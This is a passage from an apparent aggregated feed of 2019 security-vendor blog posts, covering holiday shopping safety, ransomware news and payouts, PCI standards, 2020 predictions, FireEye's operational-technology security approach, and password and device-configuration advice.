Never make purchases without HTTPS. Check the URL—if it doesn’t start with HTTPS, it doesn’t have SSL encryption. SSL (secure sockets layer) encryption is a security standard for sharing information between web servers and a browser. Without it, your private information, including your credit card number, can be more easily intercepted by cybercriminals.

Keep in mind: HTTPS only ensures that the data you send will be encrypted on the way, not that the destination is legit. Cybercriminals have started to use HTTPS to trick website users into a false sense of security. That means, while you should never send private or financial data through a site that doesn’t have HTTPS, you shouldn’t rely on the presence of HTTPS alone to guarantee the security of the page.

Don’t make purchases on devices you don’t personally own. If you’re using a borrowed or shared device, such as a computer at a library or a friend’s phone, don’t make any purchases. Even if it’s a seemingly safe device that belongs to a person you know and trust, you have no way of knowing how secure it really is. It’s pretty unlikely that you’ll encounter a lightning deal that’s worth the hassle of financial fraud or identity theft. So just wait on that purchase until you can make it on your own device.

Never use unsecured public WiFi for online purchases. Many public WiFi networks, like the ones at your local café, the gym, a hotel, etc., are completely unsecured and unencrypted. That means anyone with the know-how can easily track all of your online activities while you’re using that network, including any login or banking information. Even worse, hackers are capable of dropping viral payloads onto your device through public networks, which can then spread to your other devices at home.

Always use a VPN when you’re on public WiFi, if you have to use it at all. Otherwise, we suggest using a private mobile hotspot from your phone instead. (See our section on VPNs below.)

Use a password manager to create strong passwords. You can often stop a security breach from spreading out past the initial impact point just by using a trusted password manager, such as LastPass, which will help you create strong passwords. A password manager will create and store them for you, conveniently and securely, so you don’t have to remember them or write them down somewhere. Taking this step will help protect you from potential third-party breaches as well, like the one Amazon announced just before Black Friday in 2018.

Encrypt your traffic with a virtual private network (VPN). A VPN allows you browse privately and securely by shielding your data and location in a tunnel of encryption. So even if you are unwittingly using a compromised network, such as the unsecured public WiFi at your favorite morning coffee stop, your VPN will prevent your private data from being scooped up by cybercriminals. But be sure you’re using a trusted VPN—many free options secretly collect and sell your data to turn a profit.

Install antivirus software and keep it up to date. A VPN will protect your data from being tracked and stolen, but it can’t protect you if you click on a malicious link or download a virus. Make sure your antivirus software is from a reliable provider and that it’s not only installed, but up to date. Most antivirus products today will even update themselves automatically (as long as you don’t turn that feature off), so make sure you have such settings enabled. It may make all the difference when it comes to preventing a security breach.

Keep a close eye your bank and credit accounts for suspicious activity. The fact of the matter is that the holiday season causes a peak in malicious online activity. Be proactive and check all of your financial records regularly for suspicious charges. The faster you can alert your bank or credit provider to these transactions, the faster you can get a replacement card and be back on your merry way.

Don’t fall victim to cybercrime this holiday season. Be mindful of all the links you click and online purchases you make, and be sure to protect your devices (and your data and identity) with a VPN and strong antivirus software!

The post Cybersecurity Tips for Online Holiday Shopping appeared first on Webroot Blog.

How To Get The Most Out Of Industry Analyst Reports

Whether you’re trying to inform purchasing decisions or just want to better understand the cybersecurity market and its players, industry analyst reports can be very helpful. Following our recent accolades by Forrester and IDC in their respective cloud security reports, we want to help customers understand how to use this information.

Our VP of cybersecurity, Greg Young, taps into his past experience at Gartner to explain how to discern the most value from industry analyst reports.

The post How To Get The Most Out Of Industry Analyst Reports appeared first on .

Cyber News Rundown: Zeppelin Ransomware

Reading Time: ~ 2 min.

Zeppelin Ransomware Spreading

Over the last month, researchers have been monitoring the spread of a new ransomware variant, Zeppelin. This is the latest version of the ransomware-as-a-service that started life as VegaLocker/Buran and has differentiated itself by focusing on healthcare and IT organizations in both the U.S. and Europe. This variant is unique in that extensions are not appended, but rather a file marker called Zeppelin can be found when viewing encrypted files in a hex editor.

German ISP Faces Major GDPR Fine

The German internet service provider (ISP) 1&1 was recently fined for failing to protect the identity of customers who were reaching out to their call centers for support. While the incident took place in 2018, GDPR is clear about imposing fines for organizations that haven’t met security standards, even if retroactive changes were made. 1&1 is attempting to appeal the fines and has begun implementing a new authentication process for confirming customers’ identities over the phone.

Turkish Credit Card Dump

Nearly half a million payment cards belonging to Turkish residents were found in a data dump on a known illicit card selling site. The cards in question are both credit and debit cards and were issued by a variety of banking institutions across Turkey. This likely means that a mediating payment handler was the source of the leak, rather than a specific bank. Even more worrisome, the card dump contained full details on the cardholders, including expiration dates, CVVs, and names; everything a hacker would need to make fraudulent purchases or commit identify theft.

Pensacola Ransomware Attack

The city of Pensacola, Florida was a recent victim of a ransomware attack that stole, then encrypted their entire network before demanding $1 million ransom. In an unusual message, the authors of the Maze ransomware used explicitly stated that they had no connection to the recent shootings at the Pensacola Naval Base, nor were they targeting emergency services with their cyberattack.

Birth Certificate Data Leak

An unnamed organization that provides birth certificate services to U.S. citizens was contacted earlier this week in regard to a data leak of nearly 750,000 birth certificate applications. Within the applications was sensitive information for both the child applicant and their family members, which is highly sought after by scammers because it is relatively easy to open credit accounts for children with no prior credit history. Researchers are still waiting to hear back from the organization after finding this data dump in an unsecured Amazon Web Services bin.

The post Cyber News Rundown: Zeppelin Ransomware appeared first on Webroot Blog.

Weekly Update 169

Weekly Update 169

I recorded this right before heading out for my final conference talk of the year at YOW! Melbourne where I was due to do the closing keynote of the event. That's now done, questions answered and beers drunk and I left the event feeling great. One of the things I get the most pleasure out of at conferences is hanging around talking to people so a big thanks to everyone who made the time today to stay back on a Friday evening and cap a very busy year of conferences off in this fashion. I'm going to leave that intro here, push this week's update then do it all again (hopefully also on time!) a week from now.

Weekly Update 169
Weekly Update 169
Weekly Update 169
Weekly Update 169


  1. Why No HTTPS? is getting a complete update (new data, new ranking criteria, still not enough HTTPS!)
  2. Go home GoGetSSL, your ad is drunk! (this is just complete and utter rubbish)
  3. Oh look, a kid's tracking watch with serious security vulnerabilities! (this is such an alarmingly predictable trend now)
  4. Sponsored by: Whois XML API: The top domain WHOIS, DNS, IP and Threat Intelligence solution provider for MDR, SIEM, digital forensics, and threat hunting.

P2PE v3.0: What Merchants Need to Know

The updates to the P2PE Standard and supporting program is part of the Council’s mission to evolve security standards and validation programs to support a range of environments, technologies and methodologies for achieving security. Ultimately, the updated PCI Point-to-Point Encryption (P2PE) ® Standard and supporting program will result in more PCI P2PE ® Solutions available to the marketplace. Here we cover key questions on what merchants need to know about P2PE v3.0.

P2PE v3.0: What Vendors and Assessors Need to Know

The updates to the P2PE Standard and supporting program are part of the Council’s mission to evolve security standards and validation programs to support a range of environments, technologies and methodologies for achieving security. Ultimately, the updated PCI Point-to-Point Encryption (P2PE)® Standard and supporting program will result in more PCI P2PE®Solutions available to the marketplace. We sit down with PCI SSC Vice President, Global Head of Programs Gill Woodcock to discuss the changes to the program.  

5 Cybersecurity Predictions For 2020

While it may be true that nobody can predict the future, when it comes to cybersecurity you can give it a good go. By looking at the security developments that we have witnessed over the past few years, it is perfectly possible to forecast what is likely to happen in the near future.

Plus, with 2020 just around the corner, now is the time to do exactly that. Staying ahead of the game and doing all you can to avoid the risk of a cyber-attack is vital; and what better way is there to do just that than by preparing yourself in advance.

From the rise of 5G to the implementation of AI, here are five cybersecurity predictions for the coming year.

  1. Targeted ransomware.

While many people may see advances in technology as a good thing, coupled with that movement has seen a rise in people’s susceptibility to cyber-attacks. As time has moved on, ransomware has become more and more targeted against specific businesses, and that doesn’t look set to change in 2020.

In fact, it looks like it’s going to get worse.

Rather than initiating a cyber-attack at the first available opportunity, attackers are now biding their time, gathering intelligence on their soon-to-be victims. In doing so, this enables them to inflict maximum disruption and scale up their ransom demands accordingly.

  1. Cyber-attack? Go phish.

A cyber resilience study by the FSB found there are an incredible seven million cyber-crimes against small businesses every year. A large proportion of these attacks came via what’s known as ‘phishing’ – a type of attack used by cybercriminals masquerading as a trusted person or business to steal data. Using a malicious link, these criminals dupe victims into opening a damaging email, instant message or text message.

As time moves forward, this type of attack is going to become more and more difficult to identify, especially when you consider the growing culture of big data. Email is currently the most popularly used channel for these kinds of attack but, over the next year, cybercriminals will likely start using alternative methods, such as social media messaging and gaming platforms, to target their attacks.

  1. More devices, more problems.

Next year looks set to be the year of 5G – a new data network promising higher internet speeds than ever before. While this is very exciting, the implementation of this network will also bring with it an explosion in the numbers of connected devices and sensors across the world – from connected car services to eHealth applications.

As a result, more data will be being collected than ever before which, in turn, will heighten the potential for data theft. In order to protect against this, cybersecurity firms will therefore need to look at designing effective systems capable of minimising the risk.

  1. Artificial aid.

Most of the pre-existing security solutions available today have been built using human logic. While that may have been fine in the past, as we move forward into an ever-growing technological world, keeping informed about the latest threats is almost impossible manually. Therefore, cybersecurity firms will need to think of new, advanced ways to combat threats – and fast.

Fortunately, this is where artificial intelligence (AI) comes in. Using AI in cyber security is a great way of identifying and responding to threats before they can spread. Utilising this in cyber defence mechanisms can and will need to take centre stage in the coming months, but firms will also need to remain cautious about its potential; cybercriminals will also be able to take advantage of AI, using innovative techniques to identify vulnerabilities and infiltrate networks.

  1. Head in the cloud.

The increasing reliance for public cloud infrastructure only heightens the likelihood of being targeted by cybercriminals. After all, the more exposed a business is, the more at risk it will be.

Therefore, over the next 12 months, many companies will begin looking at their existing data centre and think about creating a hybrid cloud environment for their public and private data. This, in turn, will improve their level of data protection and safeguard them from data loss instances, such as Google’s cloud outage earlier this year.

In conclusion…

Today’s interconnected world provides a wealth of opportunities for cybercriminals and cyber security firms alike. While this may make it sound like a bit of a cat and mouse contest, it’s anything but. By being able to predict what might happen in the coming year, cybersecurity providers can stay ahead of the game and use advanced threat intelligence to develop effective counteractive systems.

The post 5 Cybersecurity Predictions For 2020 appeared first on CyberDB.

Increasing Standards Alignment and Consistency

Increasing standards alignment and consistency is a core pillar in the PCI Security Standards Council’s strategic framework, which guides how the Council achieves its mission and supports the needs of the global payments industry. In this interview with PCI SSC Operations Officer Mauro Lance, we discuss this strategic pillar and how it’s shaping Council priorities.

This Year in Ransomware Payouts (2019 Edition)

Even though 2017 still remains the year when we saw the ransomware pandemic at its peak, cybercriminals will not stop these attacks on individuals and businesses anytime soon. Unfortunately, ransomware attacks continued to make headlines this year as well. So, in this article, I’m going to look at the highest ransomware payouts of 2019, what organizations paid the ransom, and explain why it’s never a good idea to pay.

But first of all, let’s start with some mind-blowing 2019 ransomware statistics from 2019.

Ransomware statistics in 2019

Here are the most shocking ransomware facts coming from 2019 alone:

  • Two-thirds of ransomware attacks targeted state and local governments.
  • 55% of SMBs from the US would pay hackers to recover their stolen data in ransomware attacks.
  • Over 500 US schools were affected by ransomware attacks in 2019.
  • Almost 70 US government organizations were infected with ransomware since January 2019.
  • A total of 140 US local governments, police stations, and hospitals have been infected with ransomware.
  • In the third quarter of 2019, the average ransomware payout increased to $41,000.

The most significant ransomware payouts of 2019

In the best-case scenario, victims of ransomware could simply wipe their systems and recover their data from offline backups. However, some organizations don’t keep any backups at all. Or worse, even if they do have copies of their data, sometimes they also end up being locked up by cybercriminals.

There are times when ransomware victims can decrypt their files with free ransomware decryption tools but sadly, there isn’t a decryptor available for all the ransomware strains out there. This sometimes leads to companies paying the ransom, being desperate to get their business back up and running.

Without further ado, below you will find the most significant ransomware payouts of 2019.

#6. Park DuValle Community Health Center, Kentucky, USA

June 2019

Amount paid: $70,000

In June 2019, Park DuValle Community Health Center had the medical records of almost 20,000 patients encrypted by ransomware and ended up paying the $70,000 ransom. The attack had left them locked out of their system for almost two months, impacting the health center’s medical records system and appointment scheduling tool.

For seven weeks, they had to record the patients’ information on pen and paper and ask them to speak from memory about their past treatments. The health care center basically had to operate on a walk-in basis since they were not able to schedule appointments or view any data.

“This is everything. This is medical records, contact information, insurance information, anything about a patient…everything is gone,” said Elizabeth Ann Hagan-Grigsby, CEO of Park DuValle. “The records involved are for past and present patients,” she continued.

This was the second time during the same year that Park Duvalle was impacted by a ransomware attack. Back in April 2019, their systems had been locked down for about three weeks. This time, they had their data backed up, so they did not pay the ransom. However, the second time, they were unable to recover their data from the backups, so they decided to pay the ransom to restore it.

The amount was paid in 6 bitcoins (the equivalent of $70,000). Cybercriminals provided the encryption keys and Park DuValle was able to recover its data.

#5. Stratford City, Ontario, Canada

April 2019

Amount paid: $71,000

In April of this year, the City of Stratford also became a victim of a ransomware attack that chose to pay the ransom. According to the story published on Cybersecurity Insiders, the malware was installed on six of their servers on a physical note, that encrypted two virtual servers as well, leaving their sensitive data locked down.

Even though they received warnings from officials, they paid 10 bitcoins, which at the time of attack meant roughly $71,000. The security company they contacted was not able to recover their data and was only involved in forensics. Consequently, the city negotiated the price that needed to be paid for their information to become available again. Their cyber insurance covered $15,000 of the ransom.

It seems that no personally identifiable information data was compromised and revealed in this ransomware incident.

#4. La Porte County, Indiana, USA

July 2019

Amount paid: $130,000

Another victim of the Ryuk ransomware, La Porte County, Indiana, paid $130,000 to recover their data.

The attack happened on July 6 and was noticed right before it managed to spread to all of the network’s computers. The IT staff confined it to less than 7% of machines, however, two domain controllers were impacted and thus, network services became unavailable.

According to the source, the FBI and a forensic investigation firm attempted to recover the data without paying the ransom, but their efforts proved to be unsuccessful. $100,000 out of the $130,000 payment demand was covered by insurance.

Apparently, the county did have back up servers in place, however, they became infected by ransomware as well.

The ransomware that affected La Porte County’s systems is allegedly Ryuk, the same strain that affected Lake City. It was called a “triple threat” because it originated from an Emotet infection that delivered the Trickbot trojan, which then launched Ryuk.

#3. Jackson County, Georgia, USA

March 2019

Amount paid: $400,000

Back in March, Jackson County had its network shut down by a ransomware attack, leaving only its website and 911 emergency system untouched. This meant they had to do their reports and bookings in pen and paper, just like they did before using computers became the norm.

Their officials contacted the FBI and hired a cybersecurity consultant. The security specialist negotiated with the cyber attackers and it was decided that Jackson County had to transfer $400,000 to receive the decryption key and gain access to their data once again.

“We had to make a determination on whether to pay. We could have literally been down months and months and spent as much or more money trying to get our system rebuilt”, said Kevin Poe, Jackson County Manager.

Apparently, the county’s network had been infected with the Ryuk ransomware strain, which as of now, does not have a free decryption tool available. According to experts, this type of ransomware had one of the most active campaigns in 2019, also affecting over 500 schools in the US.

Researchers are saying the Ryuk ransomware only launches after it completely spreads on the target’s network.

Here is what the Ryuk ransomware note would look like:

What the Ryuk ransomware note looks like


#2. Lake City, Florida, USA

June 2019

Amount paid: $500,000

A second city in Florida paralyzed by ransomware agreed to pay the ransom: 42 bitcoins ($500,000).

Even though their IT staff disconnected the systems within ten minutes of the attack’s detection, the ransomware managed to infect their network almost entirely. The police and fire departments were not affected, as they were running on a separate network. The people who needed to pay their bills could only do it in cash or money orders and they received handwritten receipts.

Cybercriminals reached out to the city’s insurance provider a week after the infection took place and the ransom payment of 42 bitcoins was negotiated. The money was paid from the city’s insurance.

Over 100 years’ worth of records (ordinances, meeting minutes, resolutions, and City Council agendas) were encrypted for almost a month. A few weeks after the ransom was paid, they did not even recover all of their data. What’s more, Lake City’s information technology director was accused of failing to secure the network and not recovering the data quickly enough and eventually lost his job.

Lake City was another victim of the Ryuk ransomware strain.

#1. Riviera Beach City, Florida, USA

May 2019

Amount paid: $600,000

This brings us to the biggest ransomware payout of 2019, which was made by Riviera Beach City in Florida.

Allegedly, right after an employee clicked on a phishing email link received on May 29, hackers managed to infiltrate into the city’s network and locked it up. All of the city’s online systems went down, including email and even some phones, and on top of that, water utility pump stations were affected as well. As a result, payments could only be accepted in person or by mail (only in cash or by check) and communication was conducted by phone.

The City Council unanimously agreed to pay the ransom. The requested amount was 65 bitcoins, the equivalent of nearly $600,000. More than $300,000 from the city’s insurance policy was used to pay the ransom. The payment was officially made merely a few weeks after Riviera Beach agreed to spend around $1 million to replace the infected computer equipment.

Riviera Beach’s attack looked similar to what Jackson County experienced in March, so it seems they were yet another victim of the Ryuk ransomware strain.

The biggest ransom ever paid

Even though we’ve witnessed several major ransomware payouts this year, none of them was the all-time biggest.

In 2017, the Korean web hosting firm Internet Nayana received the largest ransom demand ever (a whopping $1.14 million), which they also ended up paying. During their negotiations, some of their data was permanently deleted. To make up for the incident, Nayana offered free hosting for life and refunds to its affected customers. So, of course, besides the actual payment, the ransomware attack involved additional costs and reputational damage.

Others refused to pay

Paying the ransom is not something that every ransomware victim considers. And sadly, data recovery costs for some organizations that decline the payment end up being much higher than the actual ransom. For instance, back in March 2018, the City of Atlanta was infected with the SamSam ransomware variant. Cybercriminals demanded a $52,000 ransom payment, however, Atlanta refused to pay and they had to spend $2.6 million to recover from the attack. So, since it has been proven that paying the ransom can be a lot cheaper than dealing with an attack’s aftermath, local governments are increasingly choosing to pay.

But here is an example of an organization that declined the ransomware payment.

Baltimore City’s ransomware resistance story

On May 7, 2019, cybercriminals froze around 10,000 Baltimore government computers and asked for a $100,000 payment in bitcoins. The city’s employees were locked out of their email accounts and citizens were unable to pay their bills. This wasn’t the first time the city became a victim of ransomware – in 2018, their 911 system was shut down for about a day by another similar attack and in both cases, they did not transfer money into the attackers’ Bitcoin wallet.

The second time, their computer systems were infected with the RobbinHood ransomware strain.

Bernard C. Jack Young, Mayor of Baltimore City, explained why they chose not to pay the ransom:

The city representative acknowledges that by paying the ransom there is no guarantee their systems will be unlocked and also emphasizes the fact that they are choosing not to encourage criminal behavior.

“Why don’t we just pay the ransom? I know a lot of residents have been saying we should’ve just paid the ransom or why don’t we pay the ransom?

Well, first, we’ve been advised by both the Secret Service and the FBI not to pay the ransom. Second, that’s just not the way we operate. We won’t reward criminal behavior.

If we paid the ransom, there is no guarantee they can or will unlock our system.

There’s no way of tracking the payment or even being able to confirm who we are paying the money to. Because of the way they requested payment, there’s no way of knowing if they are leaving other malware on our system to hold us for ransom again in the future.

Ultimately, we would still have to take all the steps we have taken to ensure a safe and secure environment. I’m confident we have taken the best course of action.” – Bernard C. Jack Young, Mayor of Baltimore City

US mayors have adopted a resolution against paying the ransom

A proposal to ban ransom payments was put forward by Bernard Young, the abovementioned mayor of Baltimore City, which has also been adopted. The resolution reads:

“Paying ransomware attackers encourages continued attacks on other government systems, as perpetrators financially benefit.”

“The United States Conference of Mayors has a vested interest in de-incentivizing these attacks to prevent further harm.”

“The United States Conference of Mayors stands united against paying ransoms in the event of an IT security breach.”

Although the adopted resolution doesn’t have any legal binding, it can be used to justify not paying the ransom in front of federal authorities and taxpayers.

Paying the ransom is a short-term solution

Ransomware payouts have become a highly controversial topic and for a good reason. Several questions arise when it comes to paying the ransom: Are you really going to recover your data? Where is your money actually going? Are you funding terrorist groups?

The FBI has explicitly stated that they do not support the practice and they urge organizations to report any ransomware incidents to law enforcement, no matter if they paid or not.

I strongly believe no one, be them consumers or organizations, should ever pay the ransom.

Here is why:

#1. There is no guarantee you will ever recover your files

In some cases, people still lost their data even if they paid the ransom. For instance, the GermanWiper ransomware deletes your files even though you did pay.

Also, malicious hackers actually like to be taken seriously, so if you think that by paying only a fraction of the requested amount you will get your data back (or at least some part of it), you are wrong. For example, the City of New Bedfords, Massachusetts, was yet another government institution infected with the Ryuk ransomware. They tried to negotiate for $400,000 instead of $5.3 million, aiming to align the payment with the ones that were paid by cities hit by the same type of malware. However, their offer was declined.

 #2. You are funding criminal organizations

Yes, it may be cheaper and faster to get your data back (if you are “lucky” enough) by paying the ransom. But are you really okay with transferring your money to shady hacking groups who may be using it for more malicious purposes?

#3. You are only encouraging this behavior

If organizations continue to pay the ransom, cybercriminals will not stop this practice anytime soon. In fact, it has already become a highly profitable underground business, also known as Ransomware as a Service (RaaS).

So, do you actually want to incentivize more and more attacks and contribute to the further propagation of the ransomware illegal industry?

Think about it this way. In the long run, if you’ve chosen to pay the ransom, you will definitely not save any money. Why not use the amount that you would have given to those ransomware attackers to improve your defenses instead?

How to Prevent Ransomware in Your Organization

Ransomware disasters can, fortunately, be avoided. As you’ve probably noticed from the ransomware incidents that I’ve listed, the best targets seem to be government entities that have outdated IT systems in place and that don’t always follow cybersecurity best practices.

Here is how you can stop ransomware from infecting your organization:

#1. Back up your data

I can’t stress this enough. The first and most important thing you can do is have copies of your data stored somewhere safe, that won’t get infected as well. What’s more, make sure that your back up system actually works and test it frequently.

#2. Watch out for excessive admin rights inside your organization

Sometimes, ransomware can prove to be a result of abused privileged accounts (malware propagation is often linked to compromised credentials that belong to admin accounts).

So, be certain that your organization runs on the principle of least privilege and the Zero Trust model. In short, be careful whom you grant admin rights to within your organization. A tool such as Thor AdminPrivilege™ can help you easily escalate and de-escalate privileges and when used in tandem with our other security solutions, you will get notified when threats are discovered and more than that, admin rights will be automatically de-escalated on your compromised accounts.

#3. Use security tools specifically designed to stop ransomware

For instance, a product like Thor Foresight Enterprise is properly equipped to protect your organization against ransomware. First of all, it instantly blocks any incoming attacks (for example, associated with malicious URLs) and secondly, it contains a patch management tool, created to help you close all vulnerabilities related to outdated systems and software.

#4. Train your users

Last, but not least, your users should be able to recognize the signs of cyberattacks. I often hear IT admin struggling with compromised accounts and malware infections that happen due to users that seem to keep clicking on phishing links and following the instructions (for example, submitting their login credentials).


All in all, 2019 has shown us that ransomware is still a lucrative business for cybercriminals. The organizations that are choosing to pay the ransom only worsen the situation, setting high expectations for future ransomware attackers. So, the bottom line is this: if you are ever faced with this tough decision – to pay or not to pay – think about what paying actually means.

Are you in favor of paying the ransom? Let me know your thoughts in the comments section below.

The post This Year in Ransomware Payouts (2019 Edition) appeared first on Heimdal Security Blog.

Collecting and Crafting User Information from LinkedIn

Justin Angel // Penetration testing and red team engagements often require operators to collect user information from various sources that can then be translated into inputs to support social engineering and password attacks. LinkedIn is obviously a prime source for this type of information since users can associate themselves with a particular company. Assuming we […]

The post Collecting and Crafting User Information from LinkedIn appeared first on Black Hills Information Security.

The FireEye Approach to Operational Technology Security

Today FireEye launches the Cyber Physical Threat Intelligence subscription, which provides cyber security professionals with unmatched context, data and actionable analysis on threats and risk to cyber physical systems. In light of this release, we thought it would be helpful to explain FireEye’s philosophy and broader approach to operational technology (OT) security. In summary, combined visibility into both the IT and OT environments is critical for detecting malicious activity at any stage of an OT intrusion. The FireEye approach to OT security is to:

Detect threats early using full situational awareness of IT and OT networks.

The surface area for most intrusions transcend architectural layers because at almost every level along the way there are computers (servers and workstations) and networks using the same or similar operating systems and protocols as used in IT, which serve as an avenue of approach for impacting physical assets or control of a physical process. The oft touted airgap is in many cases a myth.

There is often a singular focus from the security community on industrial control system (ICS) malware largely due to its novel nature and the fact that there have been very few examples found. This attention is useful for a variety of reasons, but disproportionate to the actual methods of the intrusions where ICS-tailored malware is used. In the attacks utilizing Industroyer and TRITON, the attackers moved from the IT network to the OT network through systems that were accessible to both environments. Traditional malware backdoors, Mimikatz extracts, remote desktop sessions and other well-documented, easily detected attack methods were used throughout these intrusions and found at every level of the IT, IT DMZ, OT DMZ and OT environments.

We believe that defenders and incident responders should focus much more attention on intrusion methods, or TTPs, across the attack lifecycle, most of which are present on what we call “intermediary systems”—predominately networked workstations and servers using operating systems and protocols that are similar to or the same as those used in IT, which are used as stepping-stones to gain access to OT assets. This approach is effective because almost all sophisticated OT attacks leverage these systems as stepping stones to their ultimate target.

To illustrate this philosophy, we present some new concepts for approaching OT threats, including the Funnel of Opportunity for OT Threat Detection and the Theory of 99, as well as practical examples derived from our analysis and incident response work. We hope these ideas challenge others in the security community to put forward new ideas and drive discussion and collaboration. We strive for a world where attacking or disrupting ICS operations costs the threat actor their cover, their toolkits, their time and their freedom.

The "Funnel of Opportunity" Highlights the Value of Detecting OT Attacks In "Intermediary Systems"

Over the past 15 years of responding to and analyzing many of the most important threats in IT and OT, FireEye observed a consistent pattern across almost all OT security incidents: There is an inverse relationship between the presence of an attacker’s activities and the severity of consequence to physical assets or processes. The attack lifecycle when viewed like this begins to take on a “funnel” shape, representing both the breadth of attacker footprint and the breadth of detection opportunity for any given level. Similarly, from top to bottom we represent the timeline of the intrusion and its proximity to the physical world. The bottom is the cross-over of impact from the cyber world to the physical world.

Figure 1: The Funnel of Opportunity for OT Threat Detection

In the early stages of the attack lifecycle, the intruder spends prolonged periods of time targeting components such as servers and workstations across IT and the IT DMZ. Identifying threat activity at this architectural level is relatively straightforward given that dwell time is high, threat actors often leave visible traces, and there are many mature security tools, services and other capabilities designed to detect this activity. While it is difficult to anticipate or associate this early intrusion activity in IT layers with more complex OT targeted attacks, IT networks remain the best zone to detect attacks.

In addition to being relatively easy to detect, early attacker activity also presents a very low risk of negative impact to OT networks. This is primarily because OT networks are commonly segmented, often with an OT DMZ separating them from IT, limiting attacker access to the industrial process. Also, targeted OT attacks commonly require threat actors to acquire abundant process documentation to determine how to cause a desired outcome. While some of this information may be available in IT networks, planning this type of attack would almost certainly require further process visibility only available in the OT network. This is why, as the intrusion progresses and the attacker gets closer or gains access to OT networks, the severity of possible negative outcomes becomes proportionally higher. However, the activity becomes more difficult to detect as the attacker’s footprint grows smaller and there are fewer security tools available to defenders.

The TRITON and Industroyer Attacks Exemplify This Phenomenon

Figure 2 shows an approximate representation of endpoints that were compromised across the architecture of victim organizations during the TRITON and Industroyer attacks. The Funnel of Opportunity is located in the intersection between the two triangles. It is here where the balance between attacker presence and operational consequence of an intrusion makes it easier and more meaningful for security organizations to identify threat activity. As a result, threat hunting close to the OT DMZ and DCS represents the most efficient approach as the detectable features of the intrusion are still present and the severity of potential consequences of the intrusion is high, but still not critical.

Figure 2: Approximate representation of endpoints compromised during the TRITON and Industroyer attacks

In both the TRITON and Industroyer incidents, the threat actor followed a consistent pattern traversing the victims’ architecture from IT networks, through the OT network, and ultimately reaching the physical process controls. In both incidents, we observed that the actor moved through segmented architectures using computers located in different zones. While we only illustrated two incidents in this blog post, we highlight that movement across zones leveraging computers has also been observed in every public OT security incident to date.

The Theory of 99: Almost All Threat Activity Happens in Windows and Linux Systems

FireEye’s unique visibility into the full attack lifecycle of thousands of intrusions from both independent research and first-hand incident response experience has enabled us to support this theory with real-world data, some of which we share here. FireEye has consistently identified similar TTPs leveraged by threat actors regardless of their target industry or ultimate goals. We believe that visibility into network traffic and endpoint behaviors are some of the most important components for IT security. These components are also critical in preventing pivots to key assets in the OT network and detecting threat activity once it does reach OT.

Our observations can be summarized in what we call the Theory of 99, which states that in intrusions that go deep enough to impact OT:

  • 99% of compromised systems will be computer workstations and servers
  • 99% of malware will be designed for computer workstations and servers
  • 99% of forensics will be performed on computer workstations and servers
  • 99% of detection opportunities will be for activity connected to computer workstations and servers
  • 99% of intrusion dwell time happens in commercial off-the-shelf (COTS) computer equipment before any Purdue level 0-1 devices are impacted

As a result, there is often a significant overlap across TTPs utilized by threat actors targeting both IT and OT networks.

Figure 3: TTPs seen across both IT and OT incidents

Figure 3 presents a summary of TTP overlaps between TRITON, Industroyer, and some relatively common activity from cybercrime group FIN6. FIN6 is a group of intrusion operators who have compromised multiple point-of-sale (POS) environments to steal payment card data and sell it in on the dark web. While the motivations and ultimate goal of the threat actors that developed TRITON and Industroyer differ significantly from FIN6, the three actors share common TTPs, including the use of Meterpreter, compromising dual-homed systems, leveraging RDP to establish remote connections and so forth. The overlap in tools and TTPs across actors interested in IT and OT should be of no surprise. The use of IT tools for OT compromises directly corresponds to a trend best known as IT/OT convergence. As IT equipment increasingly becomes integrated in OT systems and networks to improve efficiency and manageability, we can expect threat actors to be able to leverage networked computers as a conduit to reach industrial controls.

Drawing parallels between intrusions into high security environments, we can gain insight into actor behaviors and identify detection opportunities earlier in the attack lifecycle. Intelligence on intrusions across various sectors can be useful in highlighting which common and emerging adversary tools and TTPs are likely to be used in tailored attacks against organizations with OT assets.

FireEye Services, Intelligence, and Technology Provide Unparalleled Protection In IT and OT

While the FireEye approach to OT security detailed in this blog post emphasizes the criticality of “intermediary systems” when defending OT, we do not want to downplay the importance of the OT expertise and technology needed to respond to the most critical 1% of threat activity that does impact control systems. OT is in our DNA at FireEye: FireEye Mandiant’s OT practice has been one of the leading industry voices over the past six years, and the FireEye Cyber Physical Intelligence offering is the most recent evolution of the heritage of Critical Intelligence—the first commercial OT threat intelligence company founded in 2009.

Figure 4: FireEye OT-specific offerings

We believe that sharing our philosophy for OT security and highlighting FireEye’s comprehensive OT security capabilities will help organizations look at this security challenge from a different angle and take tangible steps forward to build a robust, all-encompassing security program. Figure 4 maps FireEye’s OT security offerings against the NIST Cybersecurity Framework’s Five Functions, matching FireEye services to the lifecycle of an organization’s cyber security risk management.

If you are interested in learning more or purchasing FireEye OT-focused solutions, you can reach out here: FireEye OT Solutions.

The big task for CIOs in 2020: Bringing security and IT operations together

The first step in bridging the gap starts with understanding the problem.  IT and security operations have worked in silos for decades so one might think “If it ain’t broke, don’t fix it.”  But it is, in fact, broken, and there is little awareness of the impact caused by the fragmentation.

According to a recent study conducted by Forrester on behalf of endpoint security company Tanium, 67% of IT leaders surveyed admitted that driving collaboration between the two groups is a challenge and that the rift widens an already big gap in visibility and makes resolving issues harder.

To read this article in full, please click here

(Insider Story)

Don’t gift cyber attackers access to your organisation this Christmas

Stock up on sprouts, hang the decorations and prepare for a barrage of cyber attacks, because the Christmas season is in full swing.

December is a busy time for cyber criminals, as they look to take advantage of understaffed IT departments and employees who are distracted by tight deadlines, Christmas parties and the upcoming break.

Let’s take a look at some of the most common mistakes organisations make and how to address them. Some are quick fixes that you can sort out before you go away for the holidays, whereas other require a refined, systematic approach to information security.

1. Weak passwords

Hackers can crack passwords in a variety of ways:

  • Dictionary attacks: Hackers download a text file containing a list of words (usually from a dictionary) into a cracking application, and run it against user accounts located by the application.
  • Rainbow tables: Most modern systems store passwords in a hash. This means that even if hackers can get to the area or file that stores the password, the information will be encrypted. A rainbow table helps reverse the hash by comparing the hashed password with a list of hashed dictionary entries.
  • Brute force: The hacker tries common passwords in the hope that they will find a match.

The received wisdom about passwords is that they should have at least eight characters and mix letters, numbers and special characters.

However, this often leads to ridiculously complicated passwords that are hard to remember and, ironically, comparatively easy for computers to crack.

There’s another problem: even though complex passwords are theoretically hard to crack, you’d do well to not have to write them down somewhere, which immediately compromises them.

A simpler and more secure technique is to create a mnemonic or cipher, such as taking the first character from each word of a sentence.

Organisations should create a policy that lists specific requirements for creating passwords and instructs employees to change default passwords when they create accounts. If the account contains sensitive information, organisations should consider using multi-factor or hardware-based tokens in place of system-level passwords.

2. Poorly configured devices

Inexperienced or underfunded organisations often install routers, switches and other networking gear without involving anyone who understands the security ramifications of each device.

